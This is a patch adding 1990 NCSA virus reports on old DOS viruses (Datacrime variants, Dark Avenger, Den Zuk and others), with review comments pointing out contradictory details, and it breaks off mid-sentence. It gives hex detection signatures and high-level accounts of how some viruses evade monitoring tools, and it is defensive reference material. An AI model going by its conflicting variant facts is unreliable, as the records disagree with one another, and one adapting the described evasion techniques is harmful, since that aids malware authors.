@@ -0,0 +1,57 @@ + Ŀ + VIRUS REPORT + Chaos + + +Date of Origin: First reported by James Berry in December, 1989. + +Place of Origin: Possibly Kent, England + +Host Machine: PC compatibles. + +Host Files: hard disk and floppy disk boot sectors. + +OnScreen Symptoms: None. Infected boot sectors will contain these +messages: "Welcome to the New Dungeon", "Chaos", and "Letz be cool +guys". + +Increase in Size of Infected Files: n/a + +Nature of Damage: Remains resident. Corrupts or overwrites boot sector, +affects system run-time operation, corrupts data files, formats or +erases all/part of disk. + +Detected by: Scanv53+. + +Removed by: MDisk, Cleanup, or the DOS SYS command. + + Chaos overwrites the boot sector, and flags the disk as being full of +bad sectors upon activation, though these bad sectors are still +readable. The activation criteria are unknown. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa041.txt b/textfiles.com/virus/NCSA/ncsa041.txt new file mode 100644 index 00000000..a155b22d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa041.txt 
@@ -0,0 +1,51 @@ + Ŀ + VIRUS REPORT + Christmas Card + + +Date of Origin: December, 1987. + +Host Machine: IBM E-mail system. + + This virus circulated a Christmas greeting throughout IBM's +worldwide E-mail system in December, 1987. The virus overloaded the +network, forcing IBM to shut it down temporarily. The virus was sent by +a West German law student to friends through a local European academic +research network. The virus told the receiver's computer to display the +greeting, then quietly send the virus and message to everyone on the +recipient's regular electronic mailing list. It turned out that someone +on the list had special, restricted access to IBM's E-mail network of +several thousand computers in 145 countries. IBM has since modified +their system to make repetition improbable. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa042.txt b/textfiles.com/virus/NCSA/ncsa042.txt new file mode 100644 index 00000000..9e242f8f --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa042.txt 
@@ -0,0 +1,60 @@ + Ŀ + VIRUS REPORT + Christmas Tree Virus + + +Synonyms: XA1, 1539 virus + +Date of Origin: March, 1990. + +Place of Origin: West Germany. + +Host Machine: PC compatibles. + +Host Files: COM files. Non-resident. + +OnScreen Symptoms: Between 12/24 and 1/1 will display a Christmas tree +on the screen. + +Increase in Size of Infected Files: 1,539 bytes. + +Nature of Damage: On April 1, running an infected program will destroy +the hard disk partition table. + +Detected by: Scan v61+. + +Removed by: Scan/D, or delete the infected files. + +Derived from: apparently an original. + + Discovered by Christoff Fischer, this virus displays the Christmas +tree on the screen when the system date is between December 24 and +January 1 and an infected program is executed. On April 1, it destroys +the partition table of the hard disk. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa043.txt b/textfiles.com/virus/NCSA/ncsa043.txt new file mode 100644 index 00000000..54f64950 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa043.txt @@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + Chroma + + +Date of Origin: October, 1989. + +Host Machine: PC compatibles. + + Chroma appears to display a face and talk. While doing so, it places +itself throughout the hard disk and marks the sectors as unmovable +during de-fragmentation. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa044.txt b/textfiles.com/virus/NCSA/ncsa044.txt new file mode 100644 index 00000000..ea938070 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa044.txt 
@@ -0,0 +1,50 @@ + Ŀ + VIRUS REPORT + Clone Virus + + +Host Machine: PC compatibles. + +Host Files: boot sector infector. + +OnScreen Symptoms: none. + +Increase in Size of Infected Files: n/a + +Nature of Damage: destroys the FAT after May 5, 1992. + +Derived from: Brain-C + + This virus is the Brain-C that saves the original boot copyright +label and restores it to the infected boot. The Basit & [A]mjad original +Brain messages have been replaced with non-printable garbage that looks +like instructions if viewed through Norton or another utility. Even if +the system is booted from a clean diskette, it is virtually impossible to +tell, by visual inspection, whether the hard disk is infected. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa045.txt b/textfiles.com/virus/NCSA/ncsa045.txt new file mode 100644 index 00000000..3b955e07 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa045.txt 
@@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + Clone-B + + +Host Machine: PC compatibles. + +Derived from: Clone virus. + + This is the Clone virus that has been revised to corrupt the FAT when +when your machine is booted after May 5, 1992. There are no other +apparent modifications. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa046.txt b/textfiles.com/virus/NCSA/ncsa046.txt new file mode 100644 index 00000000..14d941cd --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa046.txt 
@@ -0,0 +1,124 @@ + Ŀ + VIRUS REPORT + Dark Avenger + + +Synonyms: Black Avenger + +Date of Origin: September, 1989. + +Place of Origin: Sofia, Bulgaria. First isolated at U.C. Davis. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COMMAND.COM, EXE, COM, overlay +files. + +Increase in Size of Infected Files: 1800 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. Directly or indirectly corrupts file linkage. + +Detected by: Scanv36+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: M_DAV, CleanUp, F-Prot. + + The Dark Avenger originated in Sofia, Bulgaria, and was probably +imported to the U.S. in September, 1989 by some visiting math professors +at U.C. Davis. It was first reported by Randy Dean at the U.C. Davis +bookstore. + + It not only infects generic COM and EXE files, but will also infect +COMMAND.COM. Only files larger than 1,774 bytes will be infected. Once in COMMAND.COM, the virus will even +replicate through the DOS COPY and XCOPY commands, with both the source +and destination files being infected in the COPY process. The virus has +been named the Dark Avenger because this code appears within the virus. +The virus contains the words <197> "The Dark Avenger, copyright 1988, +1989" and the message <197> "This program was written in the city of +Sofia. Eddie lives.... Somewhere in Time!" + + The Dark Avenger increases the length of infected COM files by 1,800 +bytes. EXE files are rounded up to the next "paragraph", and the virus +is appended. + + The Dark Avenger stays resident in memory (via manipulation of +memory control blocks) and infects files via many DOS functions (such as +open, close, exec). For this reason, a file may become infected not only +when it is executed but even when viewed with PC Tools, when located with +some "FileFind" program, or when copied with COPY or XCOPY. During copy +commands, both source and target files become infected. 
+ + When the Dark Avenger loads into memory, it begins by destroying the +resident portion of COMMAND.COM, which causes reloading of the transient +portion. At this time, the virus has already hooked the necessary +interrupt and COMMAND.COM is infected first. + + Although it stays resident, the Dark Avenger can't be detected by +many programs such as MAPMEM, MI, SMAP, and others. This is because when +a such a program is executed, the virus finds the program's own memory +control block (MCB) and changes it in a way that it looks like the last +of the chain of the MCBs (originally the MCB points to the next MCB in +which virus is located). This hint is especially designed to deceive +programs such as MAPMEM. + + In addition, in the boot sector, two variables are maintained (at +offset 0x08 and 0x0A). The latter is a counter to 15 (initialized to +major version of current PC/MS-DOS). It is incremented each time an +infected program is executed. When the counter reaches 16, the number +from the first variable is used to select a random disk sector, which is +then overwritten by the virus. If this sector is used by a file, the file +is destroyed. Should the directory sector be selected and overwritten, +the results are most unpleasant. + + When the Dark Avenger installs itself, it scans the ROMs of +additional controllers to find the address of the INT 0x13 handler (the +virus knows how it begins and looks for its own first bytes). After that, +it directly calls this address. As a result, it can't be detected by a +program waiting for INT 0x13. The Dark Avenger uses INT 0x26 for this, +and is detected by many antivirus programs (such as ANTI4US) with this +interrupt. The virus affects functions of PC/MS-DOS such as "SetVector" +and "Terminate And Stay Resident". + + If anti-virus software attempts to set some of the virus's vital +interrupts via "SetVector", the Dark Avenger will prohibit this. 
If the +anti-virus software directly changes the vector table, when the software +terminates (via "Terminate And Stay Resident"), the virus restores its +vectors. + + As an extremely infectious virus, treat it cautiously. Power down +the system with the on/off switch. Re-boot from a write-protected system +master diskette. Run SCAN or some other scanner to determine the extent +of infection. The virus could conceivably be widespread. A disinfector +(M_DAV), written by Morgan Schweers, is available on the National +Computer Security Association's BBS that can remove this virus. Be sure to re-scan the disk after you +think you are finished with disinfection. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa047.txt b/textfiles.com/virus/NCSA/ncsa047.txt new file mode 100644 index 00000000..84502266 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa047.txt 
@@ -0,0 +1,107 @@ + Ŀ + VIRUS REPORT + Datacrime + + +Synonyms: 1280 virus, Columbus Day, October 12th, October 13th, Friday +13th, Munich Virus, Miami Virus + +Date of Origin: March, 1989. + +Place of Origin: Europe. + +Host Machine: PC compatibles. + +Host Files: non-resident. Infects COM files. + +OnScreen Symptoms: No screen symptoms during propagation. After October +12 of any year, it will display the message "DATACRIME VIRUS RELEASED 1 +MARCH 1989". + +Increase in Size of Infected Files: 1280 bytes. + +Nature of Damage: Corrupts program or overlay files. Formats or erases +all/part of disk. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: AntiCrim, Scan/D, F-Prot, or CleanUp. + +Scan Code: 00 56 8D B4 30 05 CD 21 or 8B 36 01 01 83 EE 03 8B C6 3D 00 00 +75 03 E9 02 01. Uses self-encryption. You can also search at offset 000H +for 2E 8B 36 01 01 83 EE 03 8B C6. + + The 1280 version of Datacrime is the earliest version, followed by +the 1168 version. Both versions infect COM files, preserving the COM +file's date and time. This virus saves the first three bytes of its host +to a "save area" inside the virus shell, replacing them with a branch to +the beginning of the virus. It appends the shell to the end of the .COM +file on a paragraph boundary. The resulting file apparently must not +exceed 64K <197> the stack is at the top of the 64K file, where the shell +resides. The stack must have room for virus use. It is not +memory-resident. + + All versions of Datacrime activate after October 12th (hence the +name October 12). In 1989 <197> its year of release <197> the day after +October 12 was Friday the 13th (hence that name). Turning off your +computer on that day will not provide any protection against it. The +first time an infected program is run on or after Oct. 
13, the virus will +search through hard drive partitions (C:, then D:, etc.), then the +directories of the A: and B: drives (in that order) for an uninfected COM +file other than COMMAND.COM. It will ignore any COM file with a D as the +seventh letter of its name (as in COMMAND.COM). It will then display the +message: "Datacrime virus released 1 March 1989" and do a low-level +format of cylinder 0 of the hard disk. + + Due to mistakes in the code, the system is almost certain to crash if +the DOS critical error handler is called (caused by a disk missing from a +drive, for example). If the computer has an ESDI, RLL, or SCSI +controller, the virus may be unsuccessful in formatting the hard disk. + + The effect of this formatting is to wipe out the FAT (file allocation +table) and the root directory, making the disk unreadable, except by +special utilities. + + Detection: + +* The original version of the Datacrime will not infect files until + after April 1st of the year (April Fool's Day). + +* The virus, depending on its variant, appends itself to .COM files + (except for COMMAND.COM), increasing the .COM file by either 1168 or + 1280 bytes. In addition, the Datacrime II variant can infect .EXE + files, increasing their size by 1514 bytes. + +* The 1168 byte version contains the hex string EB00B40ECD21B4. + +* The 1280 byte version contains the hex string 00568DB43005CD21. In + this version, you can also look for this ten-byte hex pattern: + 2E8B36010183EE038BC6. Note: the text message is encrypted, so it can't + be identified by a text string search or a disk utility. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. 
Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa048.txt b/textfiles.com/virus/NCSA/ncsa048.txt new file mode 100644 index 00000000..342d2e82 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa048.txt 
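Review bot: the sentence "Note: the text message is encrypted, so it can't be identified by a text string search or a disk utility" sits inside the 1280-byte bullet of the Detection list but applies to the whole list, since the quoted "Datacrime virus released 1 March 1989" message is given earlier as though it were searchable; give it its own bullet. The ten-byte pattern 2E8B36010183EE038BC6 offered for the 1280 version also appears, minus the leading 2E, as the Scan Code of the Datacrime-B (1168) report added later in this patch, so the list should state which variant each hex pattern actually identifies before anyone uses it for triage.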
@@ -0,0 +1,60 @@ + Ŀ + VIRUS REPORT + Datacrime-B + + +Synonyms: 1168 virus. + +Host Machine: PC compatibles. + +Host Files: EXE files. + +Increase in Size of Infected Files: 1168 bytes. + +Nature of Damage: Corrupts program or overlay files. Formats or erases +all/part of disk. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, AntiCrim, Scan/D, or F-Prot. + +Derived from: Datacrime (1280). + +Scan Code: EB 00 B4 0E CD 21 B4 or 8B 36 01 01 83 EE 03 8B C6 3D 00 00 75 +03 E9 FE 00. Uses self-encryption. + + This is the second version of the Datacrime virus. Differences +between this version and the original Datacrime: + +* EXE files are infected, COM files are not. + +* Files grow by 1168 bytes, rather than 1280 bytes. + + See the discussion of 1280/Datacrime above for major facts. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
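Review bot: the Host Files line ("EXE files") and the first difference bullet ("EXE files are infected, COM files are not") contradict the Datacrime report earlier in this patch, whose Detection list says the 1168-byte variant appends itself to .COM files and reserves EXE infection for the 1514-byte Datacrime II; one of the two records is wrong about what the 1168 variant infects, and the two should be reconciled. "See the discussion of 1280/Datacrime above" is a dangling cross-reference in a stand-alone file; name the report it means instead of "above".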
diff --git a/textfiles.com/virus/NCSA/ncsa049.txt b/textfiles.com/virus/NCSA/ncsa049.txt new file mode 100644 index 00000000..0d46f5f9 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa049.txt 
@@ -0,0 +1,64 @@ + Ŀ + VIRUS REPORT + Datacrime II (1514 variant) + + +Synonyms: 1514 virus, Columbus Day. + +Host Machine: PC compatibles. + +Host Files: COM (including COMMAND.COM) and EXE files. + +Increase in Size of Infected Files: 1514 bytes. + +Nature of Damage: Corrupts program or overlay files. Formats part of +hard disk on any date up to and including October 12, of any year, except +Sunday. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, AntiCrim, Scan/D, or F-Prot. + +Derived from: Datacrime. + +Scan Code: Uses self-encryption. 5E 81 EE 03 01 83 FE 00 74 2A 2E 8A 94. +You can also search at offset 022H for 2E 8A 07 2E C6 05 22 32 C2 D0. + + The major differences between this version and its predecessor: + +* the virus will add 1,514 bytes to infected files; + +* both COM and EXE files are infected; + +* the virus now uses self-encryption. + +* the virus will not format disks on Mondays. + + See the discussion of 1184 below. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. 
+ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa050.txt b/textfiles.com/virus/NCSA/ncsa050.txt new file mode 100644 index 00000000..f01ee3bc --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa050.txt 
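Review bot: the trigger condition is stated inconsistently within this hunk: Nature of Damage says the virus formats part of the hard disk on any date up to and including October 12 "except Sunday", while the differences list says it "will not format disks on Mondays"; pick one day and use it in both places, since a reader planning clean-up around the excluded day needs the right one. "See the discussion of 1184 below" is a dangling cross-reference, the 1184 variant being a separate file in this patch, and "the virus now uses self-encryption" is listed as new here although the Datacrime-B report in the same patch already carries "Uses self-encryption" for the 1168 version.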
@@ -0,0 +1,58 @@ + Ŀ + VIRUS REPORT + Datacrime II (1184 variant) + + +Synonyms: 1184 virus. + +Host Machine: PC compatibles. + +Host Files: COM files. + +OnScreen Symptoms: none. + +Increase in Size of Infected Files: 1184 bytes. + +Nature of Damage: Corrupts program or overlay files. Formats or erases +all/part of disk. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, AntiCrim, Scan/D, F-Prot. + +Derived from: DataCrime. + + This version is encrypted, so the hex pattern is not visible, but the +program can be detected by looking for COM files that are increased in +size by 1184 bytes. + + Datacrime 2 can be detected by running a good debugger and +single-stepping to find the end of the encryption routine (10 or 20 +instructions with obvious XOR's and a branch condition in front). + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
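Review bot: the header block drops the Scan Code field that the sibling reports carry, and the body explains why (the sample is encrypted); say so in the field rather than omitting it, and make explicit that a 1184-byte growth in COM files is the only static indicator this record offers. The debugger paragraph ("single-stepping to find the end of the encryption routine") leaves out the precondition the Disk Killer report in this patch spells out for any hands-on work, rebooting from a write-protected master diskette on a machine you can afford to lose, because the procedure executes the infected program; add it. The name also alternates between "Datacrime II" in the title and "Datacrime 2" in the body.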
diff --git a/textfiles.com/virus/NCSA/ncsa051.txt b/textfiles.com/virus/NCSA/ncsa051.txt new file mode 100644 index 00000000..ac9bd420 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa051.txt 
@@ -0,0 +1,63 @@ + Ŀ + VIRUS REPORT + Datacrime II-B + + +Synonyms: 1917 virus, Columbus Day + +Date of Origin: November, 1989. + +Place of Origin: Europe. Isolated by Jan Terpstra of the Netherlands. + +Host Machine: PC compatibles. + +Host Files: Non resident. Infects COMMAND.COM, EXE, COM files. + +OnScreen Symptoms: none. + +Increase in Size of Infected Files: 1917 bytes. + +Nature of Damage: Corrupts program or overlay files. Also formats or +erases part/all of the disk. + +Detected by: Scanv51+, F-Prot. + +Removed by: CleanUp, AntiCrim, Scan/D, F-Prot. + +Derived from: Datacrime II. + +Scan Code: encrypted. + + Differences between this virus and the Datacrime II virus: + +* Files increase in length by 1,917 bytes, rather than 1,184 bytes. + +* The encryption method used by the virus to escape detection is + different. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
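Review bot: the differences list compares only against the 1184-byte variant ("rather than 1,184 bytes"), but this patch also adds a 1514-byte Datacrime II report, so "Derived from: Datacrime II" is ambiguous; name the 1184 variant in the Derived from line. Scan Code is given only as "encrypted", so the sole static indicator in this record is the 1,917-byte growth; the 1184 report in this patch at least describes the debugger approach for locating the end of the decryption routine, and the same pointer belongs here.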
diff --git a/textfiles.com/virus/NCSA/ncsa052.txt b/textfiles.com/virus/NCSA/ncsa052.txt new file mode 100644 index 00000000..3195be02 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa052.txt 
@@ -0,0 +1,70 @@ + Ŀ + VIRUS REPORT + dBASE Virus + + +Synonyms: DBF virus + +Place of Origin: New York. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM files and overlay files. May +infect EXE files. + +Increase in Size of Infected Files: 1864 bytes. + +Nature of Damage: Corrupts DBF files. Affects system run-time operation. +Corrupts program or overlay files. + +Detected by: Scanv47+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + + Discovered by Ross Greenburg of New York, this is a memory resident +.COM/.OVL virus, which attempts to infect the dBASE program. When an +infected application is executed, the virus installs in memory, looking +for an open operation on .DBF files. Any writes to this file have two +bytes transposed at random. The virus keeps track of which files and +bytes have been altered using a file called BUG.DAT in the same directory +as the .DBF files. Reads of data are corrected by the resident portion of +the virus, thus data appear correct. However, when BUG.DAT is 90 days +old, the virus overwrites/nulls the root directory and FAT structures. +If the DBF file can be recovered, it will be recovered with non-obvious +errors. + + After this virus has been detected, if you remove the infected DBase +program and replace it with a clean copy, your DBF files that were opened +during the period that you were infected will be useless since they are +garbled on the disk even though they would be displayed as expected by +the infected Dbase program. To avoid file damage, keep multiple backups, +and keep hard copy of your transactions. Running a program such as +Deskview will permit you to look in your dBASE directory for BUG.DAT +during dBASE operations. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. 
To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa053.txt b/textfiles.com/virus/NCSA/ncsa053.txt new file mode 100644 index 00000000..58810ea3 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa053.txt 
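Review bot: Host Files says the virus "May infect EXE files" while the body calls it a ".COM/.OVL virus" that "attempts to infect the dBASE program"; resolve the EXE question, because the detection advice (look for BUG.DAT in the dBASE directory) depends on knowing which executables to check. The recovery paragraph should also state up front what follows from "Reads of data are corrected by the resident portion of the virus": removing the infected program exposes the transposed bytes, and BUG.DAT is described as the only record of which files and bytes were altered, so the record should say whether it is to be preserved for recovery before the virus is cleaned. "Deskview" appears to be a misspelling of the DESQview product name.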
@@ -0,0 +1,117 @@ + Ŀ + VIRUS REPORT + Den Zuk + + +Synonyms: Venezuelan, The Search. + +Place of Origin: Indonesia? + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy disk boot sector. + +OnScreen Symptoms: a purple "DEN ZUK" graphic will appear after a +CTRL-ALT-DEL is performed if the system has a CGA, EGA, or VGA monitor +and an infected floppy in drive A:. The rather pretty graphic slides in +from the sides of the screen. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector of 360K floppies. The original causes no +intentional damage. Some variations may reformat a floppy disk after a +counter reaches a value of 5 to 10 (depending on the version.) + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: MDisk, F-Prot, or the DOS SYS command. + +Derived from: Ohio virus + +Scan Code: FA 8C C8 8E D8 8E D0 BC 00 F0 FB B8 78 7C 50 C3. You can also +search at 03EH for BB 90 7C 53 C3 B9 B0 7C 51 C3. + + Den Zuk (translation: "The Search") was written as an anti-virus +virus. Its target: Brain infections. When this virus finds a +Brain-infected diskette, it removes Brain and puts a copy of itself in +place. It also looks for old versions of itself and "upgrades" them if +necessary. The virus resides on track 40 on diskettes (normally 360K +diskettes only have tracks numbered 0-39), and thus takes up no usable +space. + + The virus was designed as a boot sector infector that infects 360KB 5 +1/4" floppies. It infects through any access to the host diskette. It can +survive a warm reboot. It will infect data (non-system) diskettes, which +in turn can pass on the infection if an accidental attempt to boot from +the data disk occurs. + + Den Zuk has a bug which causes it to attempt to infect 3.5" +diskettes. This will overwrite the 